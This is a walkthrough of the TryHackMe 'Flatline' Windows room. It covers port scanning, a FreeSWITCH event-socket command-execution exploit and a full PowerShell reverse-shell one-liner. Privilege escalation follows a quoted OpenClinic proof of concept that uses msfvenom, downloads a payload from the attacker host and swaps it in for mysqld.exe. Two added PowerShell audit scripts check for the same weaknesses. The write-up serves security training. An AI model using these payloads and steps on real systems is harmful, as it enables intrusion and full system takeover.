THM Writeup – Flatline

Flatline

How low are your morals?

Room: Flatline

Difficulty: Easy

Operating System: Windows

Author: Nekrotic

Add IP address to your hosts file:

echo '10.10.143.60    flatline.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv flatline.thm

PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 128
8021/tcp open  ftp-proxy     syn-ack ttl 128

Get more details about open ports:

nmap -T4 -A -p 3389,8021 flatline.thm

PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
|_ssl-date: 2022-03-08T08:01:07+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

3389 is the Remote Desktop Protocol; 8021 is a less common port that nmap identifies as a FreeSWITCH service (mod_event_socket).

Let’s first check whether RDP is vulnerable to BlueKeep (CVE-2019-0708) – start Metasploit and search for bluekeep:

msfconsole
msf5 > search bluekeep

Matching Modules
================

    #  Name                                            Disclosure Date  Rank    Check  Description
    -  ----                                            ---------------  ----    -----  -----------
    0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
    1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

Select the scanner, configure and run it:

msf5 > use 0
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options

Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):

    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
    RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
    RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
    RDP_DOMAIN                        no        The client domain name to report during connect
    RDP_USER                          no        The username to report during connect, UNSET = random
    RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT            3389             yes       The target port (TCP)
    THREADS          1                yes       The number of concurrent threads (max one per host)


Auxiliary action:

    Name  Description
    ----  -----------
    Scan  Scan for exploitable targets


msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts flatline.thm
rhosts => flatline.thm
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

[*] flatline.thm:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >

The scanner output contains no vulnerable-target message, so in our case RDP is not vulnerable to BlueKeep.

Now find out what FreeSWITCH is – search for freeswitch github:

(screenshot: freeswitch search results)

According to README.md:

“FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a versatile software implementation that runs on any commodity hardware. From a Raspberry PI to a multi-core server, FreeSWITCH can unlock the telecommunications potential of any device. Combined with our hosted cloud platform, SignalWire, FreeSWITCH can interconnect with the outside world and scale to any size.”

Try to find a way to exploit it – search for freeswitch exploit:

(screenshot: freeswitch exploit search results)

Great, we found an exploit.

Copy the exploit, save it to a file (e.g. exploit.py) and make it executable:

nano exploit.py
chmod +x exploit.py

Run the exploit with a simple command to confirm that it works:

root@ip-10-10-237-164:~# python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic
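The command above ran through FreeSWITCH’s event socket, which only works when that socket is reachable from the network and accepts the client’s credentials. As an added example (not part of the writeup or of FreeSWITCH), this PowerShell audit reads event_socket.conf.xml and reports the settings that leave the socket exposed; the path assumes the Windows install location seen in this room.

```powershell
# Added example, not from the writeup: flag the mod_event_socket settings that let a
# remote client run "api" commands. Path assumed from the Windows install used in the
# room; change $confPath for other layouts.
$confPath = 'C:\Program Files\FreeSWITCH\conf\autoload_configs\event_socket.conf.xml'

function Get-EventSocketFindings {
    param([string]$Path)
    [xml]$conf = Get-Content -LiteralPath $Path -Raw
    $params = @{}
    foreach ($p in $conf.configuration.settings.param) { $params[$p.name] = $p.value }

    $findings = @()
    # The stock config binds to every interface; only loopback keeps 8021 off the network.
    if ($params['listen-ip'] -notin @('127.0.0.1', '::1')) {
        $findings += "listen-ip '$($params['listen-ip'])' exposes the event socket beyond localhost"
    }
    # The shipped password (ClueCon) is public; every deployment must set its own.
    if (-not $params['password'] -or $params['password'] -eq 'ClueCon') {
        $findings += 'password is unset or the shipped default'
    }
    # apply-inbound-acl limits which source addresses may even attempt to authenticate.
    if (-not $params.ContainsKey('apply-inbound-acl')) {
        $findings += 'no apply-inbound-acl configured'
    }
    return $findings
}

$result = Get-EventSocketFindings -Path $confPath
if ($result.Count -eq 0) { 'event_socket: no findings' }
else { $result | ForEach-Object { "event_socket: $_" } }
```

Any finding here means a host-level firewall rule for 8021 is the only thing standing between the network and command execution as the FreeSWITCH service account.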

The exploit works, so now it’s time to get a reverse shell.

Save this PowerShell command (change the IP and port to those of your listener) to a file, e.g. revshell.ps1:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.237.164',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Set up a netcat listener:

nc -lnvp 4242

Run the exploit again like this:

python3 exploit.py flatline.thm "$(cat revshell.ps1)"

The reverse connection is received:

(screenshot: reverse connection)

Find the user flag and read it:

pwd

Path                       
----                       
C:\Program Files\FreeSWITCH


PS C:\Program Files\FreeSWITCH> cd C:\Users
PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:13                Administrator                                                         
d-----       09/11/2021     07:37                Nekrotic                                                              
d-r---       09/11/2021     07:13                Public

PS C:\Users> cd Nekrotic\Desktop
PS C:\Users\Nekrotic\Desktop> dir


    Directory: C:\Users\Nekrotic\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       09/11/2021     07:39             38 root.txt                                                              
-a----       09/11/2021     07:39             38 user.txt

PS C:\Users\Nekrotic\Desktop> more user.txt
[REDACTED]

There is also a root flag, but we don’t have permission to read it – we have to elevate our privileges to NT AUTHORITY\SYSTEM.

Now let’s do some basic enumeration – see what we can find on the disk:

PS C:\Users\Nekrotic\Desktop> cd C:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       15/09/2018     08:19                PerfLogs                                                              
d-r---       09/11/2021     16:41                Program Files                                                         
d-----       09/11/2021     07:13                Program Files (x86)                                                   
d-----       09/11/2021     07:18                projects                                                              
d-r---       09/11/2021     07:28                Users                                                                 
d-----       09/11/2021     16:47                Windows

The projects folder looks interesting, let’s check it out:

PS C:\> cd projects
PS C:\projects> dir


    Directory: C:\projects


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                openclinic                                                            


PS C:\projects> cd openclinic
PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe

There is another folder, openclinic, inside projects – presumably some sort of open-source software.

Find out what openclinic is – search for openclinic:

(screenshot: openclinic search results)

Now that we know what it is, find a way to exploit it – either use Google or searchsploit.

Googling for an openclinic exploit:

(screenshot: openclinic exploit search results)

We found a proof-of-concept:

# Proof of Concept

1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe

2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start

3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"

4. Overwrite file and copy malicious .exe.
    Rename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file to mysqld.exe

5. Restart victim machine

6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system

Follow the PoC:

1. Generate the Windows reverse shell (change the IP and port to those of your listener) and start a Python HTTP server:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.237.164 LPORT=4444 -f exe > mysqld_evil.exe
python3 -m http.server

2. Open another terminal window and set up a netcat listener:

nc -lnvp 4444

3. Go back to the terminal with the reverse shell connection, rename mysqld.exe to mysqld.bak and download the malicious .exe in its place:

PS C:\projects\openclinic> cd mariadb\bin
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.bak
PS C:\projects\openclinic\mariadb\bin> Invoke-WebRequest -Uri http://10.10.237.164:8000/mysqld_evil.exe -Outfile mysqld.exe

4. Restart the target computer:

PS C:\projects\openclinic\mariadb\bin> Restart-Computer

After the restart we receive a reverse connection:

(screenshot: reverse connection)

Check which user we are connected as, go to Nekrotic’s desktop and read the root flag:

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Nekrotic\Desktop
cd C:\Users\Nekrotic\Desktop

C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
[REDACTED]
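The PoC works because the folder holding the MariaDB service binary is writable by the low-privileged user while the service itself starts as SYSTEM. As an added example (not part of the writeup or of OpenClinic), this PowerShell audit lists every service whose executable or containing directory grants write access to broad groups; it assumes English-locale group names and must be run from an elevated prompt on the host.

```powershell
# Added example, not from the writeup: find services whose binary (or its folder) can be
# replaced by ordinary users, which is what let mysqld.exe be swapped for a payload above.
# Run from an elevated PowerShell on the host being audited.
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and may carry arguments; keep only the executable.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-BroadWriteAccess {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        # Generic-rights ACEs (raw numeric values) are not decoded here and may be missed.
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

Get-CimInstance Win32_Service | ForEach-Object {
    $exe = Get-ServiceBinaryPath $_.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
    $dir = Split-Path -Parent $exe
    $exeWritable = Test-BroadWriteAccess $exe
    $dirWritable = Test-BroadWriteAccess $dir
    if ($exeWritable -or $dirWritable) {
        [pscustomobject]@{
            Service     = $_.Name
            RunsAs      = $_.StartName
            Binary      = $exe
            ExeWritable = $exeWritable
            DirWritable = $dirWritable
        }
    }
} | Format-Table -AutoSize
```

A directory flagged here is fixed by removing the broad write grant, e.g. icacls "C:\projects\openclinic\mariadb\bin" /remove:g "BUILTIN\Users", or by installing the service under Program Files, whose default ACLs already deny writes to standard users.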
